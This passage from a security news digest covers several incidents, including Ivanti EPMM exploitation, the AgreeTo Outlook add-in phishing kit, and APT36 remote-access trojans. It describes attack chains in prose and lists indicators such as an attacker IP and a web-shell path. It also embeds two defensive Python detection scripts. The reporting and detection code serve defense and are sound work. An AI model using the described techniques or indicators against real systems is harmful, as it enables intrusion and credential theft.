CISA said vulnerable edge devices remain a prime target for threat actors, OT devices without firmware verification can be permanently damaged, and threat actors leverage default credentials to pivot onto the HMI and RTUs. “Operators should prioritize updates that allow firmware verification when available,” the agency added . “Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future.” In a similar development, Jonathan Ellison, director for national resilience at the National Cyber Security Centre (NCSC), has urged critical infrastructure operators in the country to act now and have incident response plans or playbooks in place to respond to such threats. “Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does,” Ellison said .

Telnet Traffic Abruptly Collapses Global Telnet Traffic Dropped in Mid-January 2026 Threat intelligence firm GreyNoise said it observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 relates to a critical vulnerability in the GNU InetUtils telnet daemon that could result in an authentication bypass. Data gathered by GreyNoise shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 (from December 1, 2025, to January 14, 2026) to around 373,000, equating to a 59% reduction that has persisted as of February 10, 2026.

“Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15,” the company said. “Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt. Not reduced to zero.” Among the 18 ASNs included were British Telecom, Charter/Spectrum, Cox Communications, and Vultr. Although correlation does not imply causation, GreyNoise has raised the possibility that the telecom operators likely received advance warning about CVE-2026-24061, allowing them to act on it at the infrastructure level.

“A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links,” it said.

New Loaders Fuel Stealer Campaigns: New RenEngine and Foxveil Malware Loaders Spotted

Cyderes and Cato Networks have detailed new previously undocumented malware loaders dubbed RenEngine Loader and Foxveil that have been used to deliver next-stage payloads. The Foxveil malware campaign has been active since August 2025. It’s engineered to establish an initial foothold, complicate analysis efforts, and retrieve next-stage shellcode payloads from threat actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord.

Attacks leveraging RenEngine Loader, on the other hand, have employed illegally modified game installers distributed via piracy platforms to deliver the malware alongside the playable content. More than 400,000 global victims are estimated to have been impacted, with most of them located in India, the U.S., and Brazil. The activity has been operational since April 2025. “RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader, enabling rapid tooling evolution and flexible capability deployment,” Cyderes said.

“By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection.” The end goal of the attack is to deploy an information stealer called ACR Stealer.

Looker RCE Chain Disclosed: Flaws in Google Looker

Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance. This includes a remote code execution (RCE) chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse. Successful exploitation of the flaws could allow an attacker to run arbitrary code on the Looker server, potentially leading to cross-tenant access, as well as exfiltrate the full internal MySQL database via error-based SQL injection, according to Tenable.

“The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database,” Google said. Collectively tracked as CVE-2025-12743, aka LookOut (CVSS score: 6.5), they were patched by Google in September 2025. While the fixes have been applied to cloud instances, users of self-hosted Looker instances are advised to update to the latest supported version.

Trojanized 7-Zip Spreads Proxyware: Malicious 7-Zip Site Distributes Fake Installer with Proxy

A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host into a residential proxy node.

This allows third parties to route traffic through the victim’s IP address while concealing their own origins. The installer is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited. The campaign has been codenamed upStage Proxy by security researcher Luke Acha, who discovered it late last month. “The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload,” Malwarebytes said.

The 7-Zip lure appears to be part of a broader effort that uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Attack chains involve using YouTube tutorials as a malware distribution vector to direct unsuspecting users to the bogus site, once again highlighting the abuse of trusted platforms.

AI-Built VoidLink Expands Reach: More Details About VoidLink Emerge

VoidLink is a sophisticated Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. First documented by Check Point last month, ongoing analyses of the malware have revealed that it may have been developed by a Chinese-speaking developer using an artificial intelligence (AI) model with limited human review.

Ontinue, in a report published this week, said it found “strong indicators” that the implant was built using a large language model (LLM) coding agent. “It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs,” security researcher Rhys Downing said. “It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host’s kernel version.” Cisco Talos said it has observed the modular framework in campaigns undertaken by a new threat actor codenamed UAT-9921, which is believed to have been active since 2019.

The cybersecurity company said it also found “clear indications” of a Windows equivalent of VoidLink that comes with the ability to load plugins. “UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network,” Talos researchers said.

Taken together, these developments show how threat actors are balancing speed with patience — moving fast where defenses are weak, and slowing down where stealth matters more than impact. The result is activity that blends into normal operations until damage is already underway.

For defenders, the challenge isn’t just blocking entry anymore. It’s recognizing misuse of legitimate access, spotting abnormal behavior inside trusted systems, and closing gaps that don’t look dangerous on the surface. The briefs that follow aren’t isolated incidents. They’re fragments of a wider operating picture — one that keeps evolving week after week.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.


The CTEM Divide: Why 84% of Security Programs Are Falling Behind

A new 2026 market intelligence study of 128 enterprise security decision-makers (available here) reveals a stark divide forming between organizations – one that has nothing to do with budget size or industry and everything to do with a single framework decision. Organizations implementing Continuous Threat Exposure Management (CTEM) demonstrate 50% better attack surface visibility, 23-point higher solution adoption, and superior threat awareness across every measured dimension. The 16% who’ve implemented it are pulling away. The 84% who haven’t are falling behind.

The Demographics of the Divide

The research surveyed a senior cohort: 85% of respondents are Manager-level or above, representing organizations where 66% employ 5,000+ people across finance, healthcare, and retail sectors.

What is CTEM?

If you aren’t familiar, CTEM involves shifting from “patch everything reactively” to “continuously discover, validate, and prioritize risk exposures that can actually hurt the business.” It’s widely discussed in cybersecurity now as a next-generation evolution of exposure/risk management, and the new report reinforces Gartner’s view that businesses adopting it will consistently demonstrate stronger security outcomes than those that don’t.

Awareness Is High. Adoption Is Rare.

One surprising finding: There doesn’t seem to be a problem with awareness, just implementation. 87% of security leaders recognize the importance of CTEM, but only 16% have translated that awareness into operational reality. So, if they’ve heard of it, why aren’t they using it?

The gap between awareness and implementation reveals modern security’s central dilemma: which priority wins? Security leaders understand CTEM conceptually but struggle to sell its benefits in the face of organizational inertia, competing priorities, and budget constraints that force impossible tradeoffs. The challenge of gaining management buy-in is one reason why we prepared this report to provide the statistics that make the business case impossible to ignore.

Complexity is the New Multiplier

For example: Beyond a certain threshold, manual tracking of all the additional integrations, scripts, and dependencies breaks down, ownership blurs, and blind spots multiply.

The research makes it clear that attack surface complexity is not just a management challenge; it’s a direct risk multiplier. We can see this clearly in the graph below. Attack rates rise linearly from 5% (0-10 domains) to 18% (51-100 domains), then rise steeply past 100 domains. This sudden increase is driven by the ‘visibility gap’, the gulf between the assets a company is responsible for monitoring and those it’s aware of.

Each additional domain can add dozens of connected assets, and when the count climbs past 100, this can translate to thousands of additional scripts: each one a possible attack vector. Traditional snapshot security cannot hope to log and monitor them all. Only CTEM-driven programs can provide the oversight to continuously identify and validate the dark assets hiding in this visibility gap – before attackers do.

Why This Matters Now

Security leaders are currently facing a ‘perfect storm’ of demands: 91% of CISOs report an increase in third-party incidents, average breach costs have climbed to $4.44M, and PCI DSS 4.0.1 brings stricter monitoring and the ever-present specter of penalties. With this in mind, the report shows that attack surface management has become an issue for the boardroom as much as the server room, and the C-suite reader can only conclude that continuing to trust manual oversight and periodic controls to manage such a complex, high-stakes challenge would be self-destructive. One of the clearest signals in this research comes from the peer benchmarking data. When organizations compare themselves side by side – by attack surface size, visibility, tooling, and outcomes – a pattern emerges that is difficult to ignore: beyond a certain level of complexity, traditional security approaches stop scaling.

The takeaway from the peer benchmarks is clear: below a certain level of exposure, organizations can rely on periodic controls and manual oversight. Above it, those models no longer hold. For security leaders operating in high-complexity environments, the question is no longer whether CTEM is valuable – it is whether their current approach can realistically keep up without it.

This article is a contributed piece from one of our valued partners.

83% of Ivanti EPMM Exploits Linked to Single IP on Bulletproof Hosting Infrastructure

A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. Threat intelligence firm GreyNoise said it recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026. An estimated 346 exploitation sessions have originated from 193.24.123[.]42, accounting for 83% of all attempts. The malicious activity is designed to exploit CVE-2026-1281 (CVSS score: 9.8), one of the two critical security vulnerabilities in EPMM, along with CVE-2026-1340 that could be exploited by an attacker to achieve unauthenticated remote code execution.

Late last month, Ivanti acknowledged it’s aware of a “very limited number of customers” who were impacted following the zero-day exploitation of the issues. Since then, multiple European agencies, including the Netherlands’ Dutch Data Protection Authority (AP), Council for the Judiciary, the European Commission, and Finland’s Valtori, have disclosed that they were targeted by unknown threat actors using the vulnerabilities. Further analysis has revealed that the same host has been simultaneously exploiting three other CVEs across unrelated software -

  • CVE-2026-21962 (Oracle WebLogic) - 2,902 sessions
  • CVE-2026-24061 (GNU InetUtils telnetd) - 497 sessions
  • CVE-2025-24799 (GLPI) - 200 sessions

“The IP rotates through 300+ unique user agent strings spanning Chrome, Firefox, Safari, and multiple operating system variants,” GreyNoise said. “This fingerprint diversity, combined with concurrent exploitation of four unrelated software products, is consistent with automated tooling.” It’s worth noting that PROSPERO is assessed to be linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish.

GreyNoise also pointed out that 85% of the exploitation sessions beaconed home via the domain name system (DNS) to confirm “this target is exploitable” without deploying any malware or exfiltrating data. The disclosure comes days after Defused Cyber reported a “sleeper shell” campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances at the path “/mifs/403.jsp.” The cybersecurity company said the activity is indicative of initial access broker tradecraft, where threat actors establish a foothold to sell or hand off access later for financial gain. “That pattern is significant,” it noted. “OAST [out-of-band application security testing] callbacks indicate the campaign is cataloging which targets are vulnerable rather than deploying payloads immediately.

This is consistent with initial access operations that verify exploitability first and deploy follow-on tooling later.” Ivanti EPMM users are recommended to apply the patches, audit internet-facing Mobile Device Management (MDM) infrastructure, review DNS logs for OAST-pattern callbacks, monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO’s autonomous system (AS200593) at the network perimeter level. “EPMM compromise provides access to device management infrastructure for entire organizations, creating a lateral movement platform that bypasses traditional network segmentation,” GreyNoise said. “Organizations with internet-facing MDM, VPN concentrators, or other remote access infrastructure should operate under the assumption that critical vulnerabilities face exploitation within hours of disclosure.”

Update

Following the publication of the story, an Ivanti spokesperson shared the below statement with The Hacker News -

Ivanti’s recommendation remains the same: customers who have not yet patched should do so immediately, and then review their appliance for any signs of exploitation that may have occurred prior to patching. Applying the patch is the most effective way to prevent exploitation, regardless of how IoCs change over time, especially once a POC is available.

The patch requires no downtime and takes only seconds to apply. Ivanti has provided customers with high-fidelity indicators of compromise, technical analysis at disclosure, and an Exploitation Detection script developed with NCSC-NL, and continues to support customers as we respond to this threat.
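The web-log part of the monitoring advice above can be sketched as a small triage script. This is an added example, not GreyNoise's or Ivanti's tooling: it assumes Combined Log Format access logs, a constructed sample log, hypothetical rule names, and an arbitrary user-agent threshold, and it uses only the path and source IP quoted in the article.

```python
import re
from collections import defaultdict, namedtuple
from urllib.parse import unquote

# Indicators quoted in the article; the IP is refanged for matching.
SLEEPER_SHELL_PATH = "/mifs/403.jsp"
REPORTED_SOURCE_IP = "193.24.123[.]42".replace("[.]", ".")

# Assumption: logs are in Combined Log Format; adapt the pattern otherwise.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

Finding = namedtuple("Finding", "rule ip line detail")


def normalise(path):
    """Drop the query string, percent-decode, collapse slashes, case-fold."""
    path = unquote(path.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()


def triage(lines, ua_threshold=50):
    """Return findings for the three signals the article describes.

    ua_threshold is an assumed cut-off for "many user agents from one IP";
    the article reports 300+ from the single host.
    """
    findings = []
    agents = defaultdict(set)
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # malformed or truncated line, skipped
        ip, status = match["ip"], match["status"]
        agents[ip].add(match["ua"])
        if ip == REPORTED_SOURCE_IP:
            findings.append(Finding("reported-source-ip", ip, number, match["path"]))
        if normalise(match["path"]) == SLEEPER_SHELL_PATH:
            # Assumption: any status other than 404 means something answered
            # at that path and the appliance needs hands-on review.
            rule = ("sleeper-shell-path-probed" if status == "404"
                    else "sleeper-shell-path-served")
            findings.append(Finding(rule, ip, number, f"HTTP {status}"))
    for ip, seen in agents.items():
        if len(seen) >= ua_threshold:
            findings.append(
                Finding("user-agent-rotation", ip, None, f"{len(seen)} agents"))
    return findings


def _line(ip, path, status, agent):
    return (f'{ip} - - [05/Feb/2026:10:00:00 +0000] "GET {path} HTTP/1.1" '
            f'{status} 0 "-" "{agent}"')


# Constructed sample log; paths other than the article's are placeholders.
SAMPLE_LOG = [
    _line("198.51.100.7", "/", 200, "ExampleBrowser/1.0"),
    _line(REPORTED_SOURCE_IP, "/placeholder-1", 404, "ExampleAgent-A"),
    _line(REPORTED_SOURCE_IP, "/placeholder-2", 404, "ExampleAgent-B"),
    _line(REPORTED_SOURCE_IP, "/placeholder-3", 404, "ExampleAgent-C"),
    _line("203.0.113.9", "/MIFS//403.jsp?x=1", 200, "ExampleAgent-D"),
    _line("203.0.113.9", "/mifs/%34%30%33.jsp", 404, "ExampleAgent-D"),
    "truncated or malformed line",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG, ua_threshold=3):
        print(finding)
```

A "served" hit is the one to escalate first, since it means the path returned something other than "not found" on the appliance.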


Apple Fixes Exploited Zero-Day Affecting iOS, macOS, and Other Devices

Apple on Wednesday released iOS, iPadOS, macOS Tahoe, tvOS, watchOS, and visionOS updates to address a zero-day flaw that it said has been exploited in sophisticated cyber attacks. The vulnerability, tracked as CVE-2026-20700 (CVSS score: N/A), has been described as a memory corruption issue in dyld, Apple’s Dynamic Link Editor. Successful exploitation of the vulnerability could allow an attacker with memory write capability to execute arbitrary code on susceptible devices. Google Threat Analysis Group (TAG) has been credited with discovering and reporting the bug.

“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26,” the company said in an advisory. “CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.” It’s worth noting that both CVE-2025-14174 and CVE-2025-43529 were addressed by Cupertino in December 2025, with the former first disclosed by Google as having been exploited in the wild. CVE-2025-14174 (CVSS score: 8.8) relates to an out-of-bounds memory access in ANGLE’s Metal renderer component. Metal is a high-performance hardware-accelerated graphics and compute API developed by Apple.

CVE-2025-43529 (CVSS score: 8.8), on the other hand, is a use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content. The updates are available for the following devices and operating systems -

  • iOS 26.3 and iPadOS 26.3 - iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
  • macOS Tahoe 26.3 - Macs running macOS Tahoe
  • tvOS 26.3 - Apple TV HD and Apple TV 4K (all models)
  • watchOS 26.3 - Apple Watch Series 6 and later
  • visionOS 26.3 - Apple Vision Pro (all models)

In addition, Apple has also released updates to resolve various vulnerabilities in older versions of iOS, iPadOS, macOS, and Safari -

  • iOS 18.7.5 and iPadOS 18.7.5 - iPhone XS, iPhone XS Max, iPhone XR, iPad 7th generation
  • macOS Sequoia 15.7.4 - Macs running macOS Sequoia
  • macOS Sonoma 14.8.4 - Macs running macOS Sonoma
  • Safari 26.3 - Macs running macOS Sonoma and macOS Sequoia

With the latest development, Apple has moved to address its first actively exploited zero-day in 2026. Last year, the company patched nine zero-day vulnerabilities that were exploited in the wild.

First Malicious Outlook Add-In Found Stealing 4,000+ Microsoft Credentials

Cybersecurity researchers have discovered what they said is the first known malicious Microsoft Outlook add-in detected in the wild. In this unusual supply chain attack detailed by Koi Security, an unknown attacker claimed the domain associated with a now-abandoned legitimate add-in to serve a fake Microsoft login page, stealing over 4,000 credentials in the process. The activity has been codenamed AgreeToSteal by the cybersecurity company. The Outlook add-in in question is AgreeTo, which is advertised by its developer as a way for users to connect different calendars in a single place and share their availability through email.

The add-in was last updated in December 2022. Idan Dardikman, co-founder and CTO of Koi, told The Hacker News that the incident represents a broadening of supply chain attack vectors. “This is the same class of attack we’ve seen in browser extensions, npm packages, and IDE plugins: a trusted distribution channel where the content can change after approval,” Dardikman said. “What makes Office add-ins particularly concerning is the combination of factors: they run inside Outlook, where users handle their most sensitive communications, they can request permissions to read and modify emails, and they’re distributed through Microsoft’s own store, which carries implicit trust.” “The AgreeTo case adds another dimension: the original developer did nothing wrong.

They built a legitimate product and moved on. The attack exploited the gap between when a developer abandons a project and when the platform notices. Every marketplace that hosts remote dynamic dependencies is susceptible to this.” At its core, the attack exploits how Office add-ins work and the lack of periodic content monitoring of add-ins published to the Marketplace. According to Microsoft’s documentation, add-in developers are required to create an account and submit their solution to the Partner Center, following which it is subjected to an approval process.

What’s more, Office add-ins make use of a manifest file that declares a URL, the contents of which are fetched and served in real-time from the developer’s server every time it’s opened within an iframe element inside the application. However, there is nothing stopping a bad actor from taking control of an expired domain. In the case of AgreeTo, the manifest file pointed to a URL hosted on Vercel (“outlook-one.vercel[.]app”), which became claimable after the developer’s Vercel deployment was deleted due to it essentially becoming abandonware sometime around 2023. The infrastructure is still live as of writing.

The attacker took advantage of this behavior to stage a phishing kit on that URL that displayed a fake Microsoft sign-in page, capturing entered passwords, exfiltrating the details via the Telegram Bot API, and eventually redirecting the victim to the actual Microsoft login page. But Koi warns that the incident could have been worse. Given that the add-in is configured with “ReadWriteItem” permissions – which allow it to read and modify the user’s emails – a threat actor could have abused this blind spot to deploy JavaScript that can covertly siphon a victim’s mailbox contents. The findings once again bring to the fore the need for rescanning packages and tools uploaded to marketplaces and repositories to flag malicious/suspicious activity.

Dardikman said while Microsoft reviews the manifest during the initial submission phase, there is no control over the actual content that is retrieved live from the developer’s server every time the add-in is opened, once it’s signed and approved. As a result, the absence of continued monitoring of what the URL serves opens the door to unintended security risks. “Office add-ins are fundamentally different from traditional software,” Dardikman added. “They don’t ship a static code bundle.

The manifest simply declares a URL, and whatever that URL serves at any given moment is what runs inside Outlook. In AgreeTo’s case, Microsoft signed the manifest in December 2022, pointing to outlook-one.vercel.app. That same URL is now serving a phishing kit, and the add-in is still listed in the store.” To counter the security issues posed by the threat, Koi recommends a number of steps that Microsoft can take -

  • Trigger a re-review when an add-in’s URL starts returning different content from what it was during review.
  • Verify ownership of the domain to ensure that it’s managed by the add-in developer, and flag add-ins where the domain infrastructure has changed hands.
  • Implement a mechanism for delisting or flagging add-ins that have not been updated beyond a certain time period.
  • Display installation counts as a way to assess impact.

The Hacker News has reached out to Microsoft for comment, and we will update the story if we hear back. It bears noting that the problem is not limited to Microsoft Marketplace or the Office Store alone.

Last month, Open VSX announced plans to enforce security checks before Microsoft Visual Studio Code (VS Code) extensions are published to the open-source repository. Microsoft’s VS Code Marketplace, similarly, does periodic bulk rescanning of all packages in the registry. “The structural problem is the same across all marketplaces that host remote dynamic dependencies: approve once, trust forever,” Dardikman said. “The specifics vary by platform, but the fundamental gap that enabled AgreeTo exists anywhere a marketplace reviews a manifest at submission without monitoring what the referenced URLs actually serve afterward.”
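The "approve once, trust forever" gap can also be watched from the tenant side by auditing what each installed add-in's manifest URL serves today against a hash recorded when the add-in was approved. The following is an added example, not Koi's or Microsoft's code: the manifest, URL, pages, rule names and the injected `fetch` function are constructed or hypothetical, and an exact-hash comparison assumes the add-in page is static.

```python
import hashlib
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SAMPLE_URL = "https://example-addin.vercel.app/index.html"  # placeholder URL

# Constructed manifest in the Office mail add-in format; all values are samples.
SAMPLE_MANIFEST = f"""<OfficeApp
    xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="MailApp">
  <Id>00000000-0000-0000-0000-000000000000</Id>
  <Version>1.0.0.0</Version>
  <ProviderName>Example Provider</ProviderName>
  <DefaultLocale>en-US</DefaultLocale>
  <DisplayName DefaultValue="Example Scheduler"/>
  <Description DefaultValue="Constructed sample"/>
  <Hosts><Host Name="Mailbox"/></Hosts>
  <FormSettings>
    <Form xsi:type="ItemRead">
      <DesktopSettings>
        <SourceLocation DefaultValue="{SAMPLE_URL}"/>
        <RequestedHeight>250</RequestedHeight>
      </DesktopSettings>
    </Form>
  </FormSettings>
  <Permissions>ReadWriteItem</Permissions>
</OfficeApp>"""

# Constructed page bodies: what was reviewed versus what is served now.
REVIEWED_PAGE = b"<html><body><div id='calendar'></div></body></html>"
CURRENT_PAGE = b"<html><body><form><input type='password' name='p'></form></body></html>"

# Assumption: hosting suffixes where a deleted deployment's name can be re-registered.
SHARED_HOSTING_SUFFIXES = ("vercel.app",)
WRITE_PERMISSIONS = {"ReadWriteItem", "ReadWriteMailbox"}
PASSWORD_INPUT = re.compile(rb"<input[^>]*type=['\"]?password", re.I)


def sha256(body):
    return hashlib.sha256(body).hexdigest()


def read_manifest(xml_text):
    """Return (source URLs, permission level) declared by a manifest."""
    urls, permission = [], None
    for element in ET.fromstring(xml_text).iter():
        name = element.tag.rsplit("}", 1)[-1]  # strip the XML namespace
        if name == "SourceLocation" and element.get("DefaultValue"):
            urls.append(element.get("DefaultValue"))
        elif name == "Permissions":
            permission = (element.text or "").strip()
    return urls, permission


def make_fetcher(pages):
    """Offline stand-in for an HTTP client: (status, body) looked up in a dict."""
    return lambda url: (200, pages[url]) if url in pages else (404, b"")


def audit(xml_text, baseline, fetch):
    """Compare what each manifest URL serves now with the approved baseline."""
    urls, permission = read_manifest(xml_text)
    findings = []
    for url in urls:
        status, body = fetch(url)
        if status != 200:
            findings.append(("unreachable", url))      # deployment may be gone
        elif url not in baseline:
            findings.append(("no-baseline", url))
        elif sha256(body) != baseline[url]:
            findings.append(("content-changed", url))
        host = urlsplit(url).hostname or ""
        if host.endswith(tuple("." + s for s in SHARED_HOSTING_SUFFIXES)):
            findings.append(("reclaimable-host", url))
        if PASSWORD_INPUT.search(body):
            findings.append(("password-form", url))    # add-in asks for a password
    drift = any(rule in ("unreachable", "content-changed") for rule, _ in findings)
    if drift and permission in WRITE_PERMISSIONS:
        severity = "high"
    elif drift:
        severity = "medium"
    else:
        severity = "low" if findings else "none"
    return {"permission": permission, "findings": findings, "severity": severity}


if __name__ == "__main__":
    approved = {SAMPLE_URL: sha256(REVIEWED_PAGE)}
    print(audit(SAMPLE_MANIFEST, approved, make_fetcher({SAMPLE_URL: CURRENT_PAGE})))
```

In production the `fetch` argument would be a real HTTP client, and add-ins with dynamic pages would need a looser comparison than a whole-body hash.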

APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines. The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often attributed to Pakistan-aligned threat clusters tracked as SideCopy and APT36 (aka Transparent Tribe). SideCopy, active since at least 2019, is assessed to operate as a subdivision of Transparent Tribe.

“Taken together, these campaigns reinforce a familiar but evolving narrative,” Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka, said. “Transparent Tribe and SideCopy are not reinventing espionage – they are refining it.” “By expanding cross-platform coverage, leaning into memory-resident techniques, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining strategic focus.” Common to all the campaigns is the use of phishing emails containing malicious attachments or embedded download links that lead prospective targets to attacker-controlled infrastructure. These initial access mechanisms serve as a conduit for Windows shortcuts (LNK), ELF binaries, and PowerPoint Add-In files that, when opened, launch a multi-stage process to drop the trojans. The malware families are designed to provide persistent remote access, enable system reconnaissance, collect data, execute commands, and facilitate long-term post-compromise operations across both Windows and Linux environments.

One of the attack chains is as follows: a malicious LNK file invokes “mshta.exe” to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript to decrypt an embedded DLL payload, which, in turn, processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the saved decoy file. After the lure document is displayed, the malware checks for installed security products and adapts its persistence method accordingly prior to deploying Geta RAT on the compromised host. It’s worth noting this attack chain was detailed by CYFIRMA and Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.

Geta RAT supports various commands to collect system information, enumerate running processes, terminate a specified process, list installed apps, gather credentials, retrieve and replace clipboard contents with attacker-supplied data, capture screenshots, perform file operations, run arbitrary shell commands, and harvest data from connected USB devices. Running parallel to this Windows-focused campaign is a Linux variant that employs a Go binary as a starting point to drop a Python-based Ares RAT by means of a shell script downloaded from an external server. Like Geta RAT, Ares RAT can also run a wide range of commands to harvest sensitive data and run Python scripts or commands issued by the threat actor. Aryaka said it also observed another campaign where the Golang malware, DeskRAT, is delivered via a rogue PowerPoint Add-In file that runs an embedded macro to establish outbound communication with a remote server to fetch the malware.

APT36’s use of DeskRAT was documented by Sekoia and QiAnXin XLab in October 2025. “These campaigns demonstrate a well-resourced, espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure,” the company said. “The activity extends beyond defense to policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.” “The deployment of DeskRAT, alongside Geta RAT and Ares RAT, underscores an evolving toolkit optimized for stealth, persistence, and long-term access.”

Over 60 Software Vendors Issue Security Fixes Across OS, Cloud, and Network Platforms

It’s Patch Tuesday, which means a number of software vendors have released patches for various security vulnerabilities impacting their products and services. Microsoft issued fixes for 59 flaws, including six actively exploited zero-days in various Windows components that could be abused to bypass security features, escalate privileges, and trigger a denial-of-service (DoS) condition. Elsewhere, Adobe released updates for Audition, After Effects, InDesign Desktop, Substance 3D, Bridge, Lightroom Classic, and DNG SDK. The company said it’s not aware of in-the-wild exploitation of any of the shortcomings.

SAP shipped fixes for two critical-severity vulnerabilities, including a code injection bug in SAP CRM and SAP S/4HANA (CVE-2026-0488, CVSS score: 9.9) that an authenticated attacker could use to run an arbitrary SQL statement and lead to a full database compromise. The second critical vulnerability is a case of a missing authorization check in SAP NetWeaver Application Server ABAP and ABAP Platform (CVE-2026-0509, CVSS score: 9.6) that could permit an authenticated, low-privileged user to perform certain background Remote Function Calls without the required S_RFC authorization. “To patch the vulnerability, customers must implement a kernel update and set a profile parameter,” Onapsis said. “Adjustments in user roles and UCON settings might be required to not interrupt business processes.”

Rounding off the list, Intel and Google said they teamed up to examine the security of Intel Trust Domain Extensions (TDX) 1.5, uncovering five vulnerabilities in the module (CVE-2025-32007, CVE-2025-27940, CVE-2025-30513, CVE-2025-27572, and CVE-2025-32467), and nearly three dozen weaknesses, bugs, and improvement suggestions.

“Intel TDX 1.5 introduces new features and functionality that bring confidential computing significantly closer to feature parity with traditional virtualization solutions,” Google said. “At the same time, these features have increased the complexity of a highly privileged software component in the TCB [Trusted Computing Base].”

Software Patches from Other Vendors

Security updates have also been released by other vendors in recent weeks to rectify several vulnerabilities, including: ABB, Amazon Web Services, AMD, AMI, Apple, ASUS, AutomationDirect, AVEVA, Broadcom (including VMware), Canon, Check Point, Cisco, Citrix, Commvault, ConnectWise, D-Link, Dassault Systèmes, Dell, Devolutions, dormakaba, Drupal, F5, Fortinet, Foxit Software, FUJIFILM, Fujitsu, Gigabyte, GitLab, Google Android and Pixel, Google Chrome, Google Cloud, Grafana, Hikvision, Hitachi Energy, HP, HP Enterprise (including Aruba Networking and Juniper Networks), IBM, Intel, Ivanti, Lenovo, Linux distributions (AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu), MediaTek, Mitsubishi Electric, MongoDB, Moxa, Mozilla Firefox and Thunderbird, n8n, NVIDIA, Phoenix Contact, QNAP, Qualcomm, Ricoh, Rockwell Automation, Samsung, Schneider Electric, ServiceNow, Siemens, SolarWinds, Splunk, Spring Framework, Supermicro, Synology, TP-Link, WatchGuard, Zoho ManageEngine, Zoom, and Zyxel.

Exposed Training Open the Door for Crypto-Mining in Fortune 500 Cloud Environments

Intentionally vulnerable training applications are widely used for security education, internal testing, and product demonstrations. Tools such as OWASP Juice Shop, DVWA, Hackazon, and bWAPP are designed to be insecure by default, making them useful for learning how common attack techniques work in controlled environments. The issue is not the applications themselves, but how they are often deployed and maintained in real-world cloud environments. Pentera Labs examined how training and demo applications are being used across cloud infrastructures and identified a recurring pattern: applications intended for isolated lab use were frequently found exposed to the public internet, running inside active cloud accounts, and connected to cloud identities with broader access than required.

Deployment Patterns Observed in the Research

